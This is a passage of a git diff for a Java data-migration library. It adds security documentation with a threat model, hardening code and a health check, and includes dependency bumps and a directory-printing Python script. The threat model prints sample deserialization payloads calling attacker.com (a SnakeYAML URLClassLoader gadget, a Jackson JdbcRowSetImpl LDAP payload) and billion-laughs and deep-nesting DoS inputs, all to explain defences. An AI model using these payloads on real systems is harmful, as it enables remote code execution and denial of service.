.migrate(tagged) + .from(fromVersion) + .to(toVersion) + .execute(); + } catch (Exception e) { + throw new MigrationException("XML migration failed", e); + } + } + + private void validateSize(byte[] input) { + if (input.length > MAX_SIZE) { + throw new PayloadTooLargeException("Input exceeds maximum size"); + } + } + + private void validateSize(String input) { + if (input.length() > MAX_SIZE) { + throw new PayloadTooLargeException("Input exceeds maximum size"); + } + } +} +``` + +--- + +## Exception Handling + +### Global Exception Handler + +```java +import org.springframework.http.HttpStatus; +import org.springframework.http.ResponseEntity; +import org.springframework.web.bind.annotation.ExceptionHandler; +import org.springframework.web.bind.annotation.RestControllerAdvice; + +@RestControllerAdvice +public class MigrationExceptionHandler { + + private static final Logger LOG = LoggerFactory.getLogger(MigrationExceptionHandler.class); + + @ExceptionHandler(PayloadTooLargeException.class) + public ResponseEntity handlePayloadTooLarge(PayloadTooLargeException e) { + LOG.warn("Payload too large: {}", e.getMessage()); + return ResponseEntity + .status(HttpStatus.PAYLOAD_TOO_LARGE) + .body(new ErrorResponse("PAYLOAD_TOO_LARGE", "Payload exceeds maximum size")); + } + + @ExceptionHandler(SecurityException.class) + public ResponseEntity handleSecurityException(SecurityException e) { + LOG.warn("Security violation: {}", e.getMessage()); + return ResponseEntity + .status(HttpStatus.BAD_REQUEST) + .body(new ErrorResponse("SECURITY_VIOLATION", "Invalid input detected")); + } + + @ExceptionHandler(MigrationTimeoutException.class) + public ResponseEntity handleTimeout(MigrationTimeoutException e) { + LOG.error("Migration timeout: {}", e.getMessage()); + return ResponseEntity + .status(HttpStatus.GATEWAY_TIMEOUT) + .body(new ErrorResponse("MIGRATION_TIMEOUT", "Migration timed out")); + } + + @ExceptionHandler(MigrationException.class) + public ResponseEntity handleMigrationError(MigrationException e) { + LOG.error("Migration failed: {}", e.getMessage()); + // Don't expose internal error details + return ResponseEntity + .status(HttpStatus.INTERNAL_SERVER_ERROR) + .body(new ErrorResponse("MIGRATION_FAILED", "Migration failed")); + } + + public record ErrorResponse(String code, String message) {} +} +``` + +--- + +## Configuration Properties + +### Security Properties + +```yaml +# application.yml +aether: + datafixers: + security: + max-payload-size: 10485760 # 10MB + max-nesting-depth: 50 + migration-timeout: 30s + rate-limit: + requests-per-minute: 60 +``` + +```java +@ConfigurationProperties(prefix = "aether.datafixers.security") +public record SecurityProperties( + long maxPayloadSize, + int maxNestingDepth, + Duration migrationTimeout, + RateLimitProperties rateLimit +) { + public record RateLimitProperties(int requestsPerMinute) {} +} +``` + +--- + +## Health Indicator + +### Security Health Check + +```java +import org.springframework.boot.actuate.health.Health; +import org.springframework.boot.actuate.health.HealthIndicator; +import org.springframework.stereotype.Component; + +@Component +public class SecureMigrationHealthIndicator implements HealthIndicator { + + private final Yaml secureYaml; + private final ObjectMapper secureJsonMapper; + + public SecureMigrationHealthIndicator(Yaml secureYaml, ObjectMapper secureJsonMapper) { + this.secureYaml = secureYaml; + this.secureJsonMapper = secureJsonMapper; + } + + @Override + public Health health() { + try { + // Verify secure configurations are active + verifyYamlSecurity(); + verifyJacksonSecurity(); + + return Health.up() + .withDetail("yaml", "SafeConstructor enabled") + .withDetail("jackson", "StreamReadConstraints configured") + .build(); + } catch (Exception e) { + return Health.down() + .withDetail("error", e.getMessage()) + .build(); + } + } + + private void verifyYamlSecurity() { + // Attempt to parse a malicious payload should fail + String malicious = "!!java.lang.ProcessBuilder [[\"test\"]]"; + try { + secureYaml.load(malicious); + throw new IllegalStateException("SafeConstructor not configured!"); + } catch (org.yaml.snakeyaml.constructor.ConstructorException e) { + // Expected - SafeConstructor is working + } + } + + private void verifyJacksonSecurity() { + // Verify constraints are configured + JsonFactory factory = secureJsonMapper.getFactory(); + StreamReadConstraints constraints = factory.streamReadConstraints(); + if (constraints.getMaxNestingDepth() > 100) { + throw new IllegalStateException("Nesting depth limit too high"); + } + } +} +``` + +--- + +## Related + +- [Best Practices](best-practices.md) +- [Secure Configuration Examples](secure-configuration-examples.md) +- [Spring Boot Overview](../spring-boot/index.md) +- [MigrationService API](../spring-boot/migration-service.md) diff --git a/docs/security/threat-model.md b/docs/security/threat-model.md new file mode 100644 index 0000000..0516ca2 --- /dev/null +++ b/docs/security/threat-model.md @@ -0,0 +1,278 @@ +# Threat Model + +This document describes the threat model for Aether Datafixers when processing untrusted data. Understanding these threats helps you make informed decisions about security controls. + +## Overview + +Aether Datafixers processes serialized data (JSON, YAML, XML, TOML) and applies migrations to transform it between schema versions. When this data comes from untrusted sources, attackers may craft malicious payloads to exploit vulnerabilities in the parsing or processing pipeline. + +## Trust Boundaries + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ UNTRUSTED ZONE │ +│ │ +│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────────┐ │ +│ │ User │ │ External │ │ Message │ │ Database │ │ +│ │ Uploads │ │ APIs │ │ Queues │ │ Blobs │ │ +│ └────┬─────┘ └────┬─────┘ └────┬─────┘ └──────┬───────┘ │ +│ │ │ │ │ │ +└───────┼─────────────┼─────────────┼───────────────┼─────────────┘ + │ │ │ │ + ▼ ▼ ▼ ▼ +╔═══════════════════════════════════════════════════════════════╗ +║ TRUST BOUNDARY ║ +║ ┌─────────────────────────────────────────────────────────┐ ║ +║ │ INPUT VALIDATION │ ║ +║ │ • Size limits • Depth limits • Format validation│ ║ +║ └─────────────────────────────────────────────────────────┘ ║ +╚═══════════════════════════════════════════════════════════════╝ + │ + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ TRUSTED ZONE │ +│ │ +│ ┌───────────────┐ ┌────────────────┐ ┌───────────────┐ │ +│ │ DynamicOps │───▶│ DataFixer │───▶│ Application │ │ +│ │ (Parsing) │ │ (Migration) │ │ Logic │ │ +│ └───────────────┘ └────────────────┘ └───────────────┘ │ +│ │ +└─────────────────────────────────────────────────────────────────┘ +``` + +### Untrusted Data Sources + +| Source | Examples | Trust Level | +|--------------------|----------------------------------------|---------------------------------------------------| +| User Uploads | Game saves, config imports, data files | **Untrusted** | +| External APIs | Third-party integrations, webhooks | **Untrusted** | +| Message Queues | Kafka topics, RabbitMQ queues | **Untrusted** (unless internal) | +| Database Blobs | Serialized objects in DB columns | **Semi-trusted** (may contain legacy unsafe data) | +| Internal Services | Same-cluster microservices | **Trusted** (if properly authenticated) | +| Local Config Files | Application configuration | **Trusted** (deployed by operators) | + +## Attack Vectors + +### 1. Arbitrary Code Execution (RCE) + +**Severity:** Critical +**Affected:** SnakeYAML (default constructor) + +SnakeYAML's default constructor can instantiate arbitrary Java classes, allowing attackers to execute code by crafting malicious YAML: + +```yaml +# Malicious YAML that attempts to execute code +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker.com/malicious.jar"] + ]] +] +``` + +**Impact:** Complete system compromise, data theft, lateral movement. + +**Mitigation:** Always use `SafeConstructor` for untrusted YAML. See [SnakeYAML Security](format-considerations/snakeyaml.md). + +--- + +### 2. Billion Laughs Attack (Entity Expansion) + +**Severity:** High +**Affected:** YAML (aliases), XML (entities) + +Exponential expansion of aliases or entities can consume all available memory: + +```yaml +# YAML Billion Laughs +a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] +b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] +c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] +d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] +e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] +f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] +# Expands to billions of elements +``` + +```xml + + + + + +]> +&lol9; +``` + +**Impact:** Denial of Service through memory exhaustion, application crash. + +**Mitigation:** +- YAML: Set `maxAliasesForCollections` in `LoaderOptions` +- XML: Disable DTD processing or limit entity expansion + +--- + +### 3. XXE (XML External Entity) Injection + +**Severity:** High +**Affected:** XML + +External entity references can read local files or make server-side requests: + +```xml + + +]> +&xxe; +``` + +```xml + + + +]> +&xxe; +``` + +**Impact:** +- **Confidentiality:** Read sensitive files (credentials, configs) +- **SSRF:** Access internal services, cloud metadata endpoints +- **DoS:** Reference slow or infinite resources + +**Mitigation:** Disable external entity processing and DTDs. See [Jackson XML Security](format-considerations/jackson.md#xxe-prevention). + +--- + +### 4. Polymorphic Deserialization Attacks + +**Severity:** Medium-High +**Affected:** Jackson (with default typing enabled) + +When Jackson's default typing is enabled, attackers can specify arbitrary classes for deserialization: + +```json +{ + "@class": "com.sun.rowset.JdbcRowSetImpl", + "dataSourceName": "ldap://attacker.com/exploit", + "autoCommit": true +} +``` + +**Impact:** Remote code execution through gadget chains. + +**Mitigation:** Never enable default typing for untrusted data. If polymorphic deserialization is required, use allowlist-based `PolymorphicTypeValidator`. See [Jackson Security](format-considerations/jackson.md). + +--- + +### 5. Resource Exhaustion (DoS) + +**Severity:** Medium +**Affected:** All formats + +Large payloads or deeply nested structures can exhaust memory or CPU: + +```json +{ + "a": { + "b": { + "c": { + // ... nested 10,000 levels deep + } + } + } +} +``` + +**Impact:** Denial of Service, application unresponsiveness. + +**Mitigation:** +- Validate input size before parsing +- Configure nesting depth limits +- Set string length limits +- Implement timeouts + +--- + +### 6. Stack Overflow + +**Severity:** Medium +**Affected:** All formats (recursive parsing) + +Deeply nested structures can cause stack overflow during parsing or migration: + +```json +[[[[[[[[[[[[[[[[[[[[[[...]]]]]]]]]]]]]]]]]]]]]] +``` + +**Impact:** Application crash, potential DoS. + +**Mitigation:** Configure nesting depth limits in parser settings. + +--- + +## Impact Assessment + +| Attack | Confidentiality | Integrity | Availability | +|-----------------------------|-----------------|-----------|--------------| +| RCE (SnakeYAML) | High | High | High | +| Billion Laughs | Low | Low | **High** | +| XXE | **High** | Low | Medium | +| Polymorphic Deserialization | High | High | High | +| Resource Exhaustion | Low | Low | **High** | +| Stack Overflow | Low | Low | High | + +## Attack Scenarios + +### Scenario 1: Game Save Import + +A gaming platform allows users to import save files in YAML format. + +**Attack:** User uploads a YAML file with malicious constructor tags. +**Impact:** RCE on the game server, access to other users' data. +**Defense:** Use `SafeConstructor`, validate file size, sandbox processing. + +### Scenario 2: Configuration API + +A microservice accepts JSON configuration updates via REST API. + +**Attack:** Attacker sends deeply nested JSON to exhaust memory. +**Impact:** Service becomes unresponsive, affecting all users. +**Defense:** Size limits, depth limits, rate limiting. + +### Scenario 3: Legacy Data Migration + +An application migrates XML data stored in database blobs. + +**Attack:** Legacy data contains XXE payloads (intentional or from old vulnerabilities). +**Impact:** Data exfiltration during migration process. +**Defense:** Disable external entities, validate before migration. + +### Scenario 4: Webhook Processing + +A service processes webhook payloads from third-party integrations. + +**Attack:** Malicious webhook sends payload with polymorphic type hints. +**Impact:** RCE through deserialization gadgets. +**Defense:** Never enable default typing, validate webhook signatures. + +## Security Checklist + +Before processing untrusted data, verify: + +- [ ] Input size is validated before parsing +- [ ] Parser is configured with depth/nesting limits +- [ ] Format-specific protections are enabled: + - [ ] YAML: Using `SafeConstructor` with alias limits + - [ ] XML: External entities and DTDs disabled + - [ ] Jackson: Default typing is NOT enabled +- [ ] Timeouts are configured for migration operations +- [ ] Errors are logged without exposing sensitive information +- [ ] Rate limiting is applied for user-submitted data + +## Related + +- [Best Practices](best-practices.md) +- [Format-Specific Security](format-considerations/index.md) +- [Secure Configuration Examples](secure-configuration-examples.md) diff --git a/docs/testkit/test-data-builders.md b/docs/testkit/test-data-builders.md index 157dba9..283e849 100644 --- a/docs/testkit/test-data-builders.md +++ b/docs/testkit/test-data-builders.md @@ -31,8 +31,6 @@ TestData.jacksonXml()... TestData.using(myCustomOps)... ``` -> **Deprecation Notice:** `TestData.jackson()` is deprecated since 0.5.0 and will be removed in 1.0.0. Use `TestData.jacksonJson()` instead for explicit format naming. - ## Creating Primitives ```java diff --git a/docs/troubleshooting/index.md b/docs/troubleshooting/index.md index 1012d62..98544fa 100644 --- a/docs/troubleshooting/index.md +++ b/docs/troubleshooting/index.md @@ -8,6 +8,12 @@ Solutions to common issues with Aether Datafixers. - [Debugging Tips](debugging-tips.md) — Strategies for finding issues - [FAQ](faq.md) — Frequently asked questions +## Operations Runbook + +For production operations, incident response, and recovery procedures, see the [Operations Runbook](../operations/index.md). + +--- + ## Quick Fixes ### Migration Not Applied diff --git a/pom.xml b/pom.xml index 254ac21..ac74cb0 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT pom aether-datafixers-api @@ -19,6 +19,7 @@ aether-datafixers-examples aether-datafixers-bom aether-datafixers-functional-tests + aether-datafixers-benchmarks @@ -31,25 +32,25 @@ true - 26.0.2 + 26.0.2-1 2.13.2 - 2.19.0 + 2.21.0 33.5.0-jre 5.13.4 - 3.27.6 + 3.27.7 2.0.17 4.9.8 - 3.11.0 - 3.4.1 - 3.3.1 - 3.10.1 - 3.20.0 - 3.2.6 - 3.1.2 - 3.1.2 - 3.5.1 + 3.14.1 + 3.6.2 + 3.4.0 + 3.12.0 + 3.21.0 + 3.2.8 + 3.5.4 + 3.5.4 + 3.6.1 0.8.14 @@ -63,10 +64,13 @@ 0.75 - 4.7.6 + 4.7.7 - 2.2 + 2.5 + + + 1.37 Aether Datafixers :: Parent @@ -213,6 +217,18 @@ ${spotbugs.version} provided + + + org.openjdk.jmh + jmh-core + ${jmh.version} + + + org.openjdk.jmh + jmh-generator-annprocess + ${jmh.version} + provided + @@ -313,7 +329,7 @@ org.sonatype.central central-publishing-maven-plugin - 0.8.0 + 0.10.0 true central diff --git a/scripts/structure.py b/scripts/structure.py new file mode 100644 index 0000000..fdf1d0f --- /dev/null +++ b/scripts/structure.py @@ -0,0 +1,104 @@ +import os +import fnmatch +import argparse + +def apply_color(text, color_code, use_colors): + return f"\033[{color_code}m{text}\033[0m" if use_colors else text + +def print_structure(dir_path, depth, file_pattern, use_colors, excluded_folders): + try: + entries = os.listdir(dir_path) + except Exception: + return + + if not entries: + return + + full_paths = [os.path.join(dir_path, entry) for entry in entries] + full_paths.sort(key=lambda p: os.path.isfile(p)) + + for path in full_paths: + name = os.path.basename(path) + if name in {".", ".."} or name in excluded_folders: + continue + indent = " " * (depth * 4) + if os.path.isdir(path): + print(f"{indent}" + apply_color(f"📁 {name}", "34", use_colors)) + print_structure(path, depth + 1, file_pattern, use_colors, excluded_folders) + elif fnmatch.fnmatch(name, file_pattern): + print(f"{indent} " + apply_color(f"📄 {name}", "32", use_colors)) + +def print_dependency_tree(dir_path, depth=0, file_pattern="*.java", use_colors=True, excluded_folders=set()): + try: + entries = os.listdir(dir_path) + except Exception: + return + + entries.sort() + for entry in entries: + full_path = os.path.join(dir_path, entry) + if entry in excluded_folders or entry in {".", ".."}: + continue + indent = "| " * depth + "|-- " + if os.path.isdir(full_path): + print(indent + apply_color(f"{entry}/", "34", use_colors)) + print_dependency_tree(full_path, depth + 1, file_pattern, use_colors, excluded_folders) + elif fnmatch.fnmatch(entry, file_pattern): + print(indent + apply_color(entry, "32", use_colors)) + +def export_structure_to_file(output_file, mode, file_pattern, root_path, excluded_folders): + with open(output_file, "w", encoding="utf-8") as f: + def write_structure(dir_path, depth): + try: + entries = os.listdir(dir_path) + except Exception: + return + + entries.sort() + for entry in entries: + full_path = os.path.join(dir_path, entry) + if entry in excluded_folders or entry in {".", ".."}: + continue + indent = " " * depth + if os.path.isdir(full_path): + f.write(f"{indent}{entry}/\n") + write_structure(full_path, depth + 1) + elif fnmatch.fnmatch(entry, file_pattern): + f.write(f"{indent}{entry}\n") + + f.write("Package Structure:\n") + if mode == "tree": + f.write(f"ROOT ({root_path})\n") + write_structure(root_path, 1) + else: + f.write(f"ROOT ({root_path})\n") + write_structure(root_path, 1) + +def print_package_structure(root_path, mode="default", file_pattern="*.java", output_file=None, use_colors=True, excluded_folders=set()): + if not os.path.exists(root_path) or not os.path.isdir(root_path): + print("❌ Root directory does not exist: " + root_path) + return + + print(f"\n📂 Package Structure ({root_path}):") + if mode == "tree": + print("|-- ROOT") + print_dependency_tree(root_path, 1, file_pattern, use_colors, excluded_folders) + else: + print("📁 ROOT") + print_structure(root_path, 1, file_pattern, use_colors, excluded_folders) + + if output_file: + export_structure_to_file(output_file, mode, file_pattern, root_path, excluded_folders) + print(f"\n✅ Structure exported to {output_file}") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Print the package structure of a Java project.") + parser.add_argument("root_path", type=str, help="Root directory of the project") + parser.add_argument("mode", nargs="?", choices=["default", "tree"], default="default", help="Output mode") + parser.add_argument("--filter", type=str, default="*.java", help="Filter files by wildcard pattern (e.g., '*.java')") + parser.add_argument("--output", type=str, help="Export output to a file") + parser.add_argument("--no-color", action="store_true", help="Disable colored output") + parser.add_argument("--exclude", type=str, nargs="*", default=["target", "build", ".git", "node_modules"], help="Folders to exclude") + + args = parser.parse_args() + print_package_structure(args.root_path, args.mode, args.filter, args.output, not args.no_color, set(args.exclude))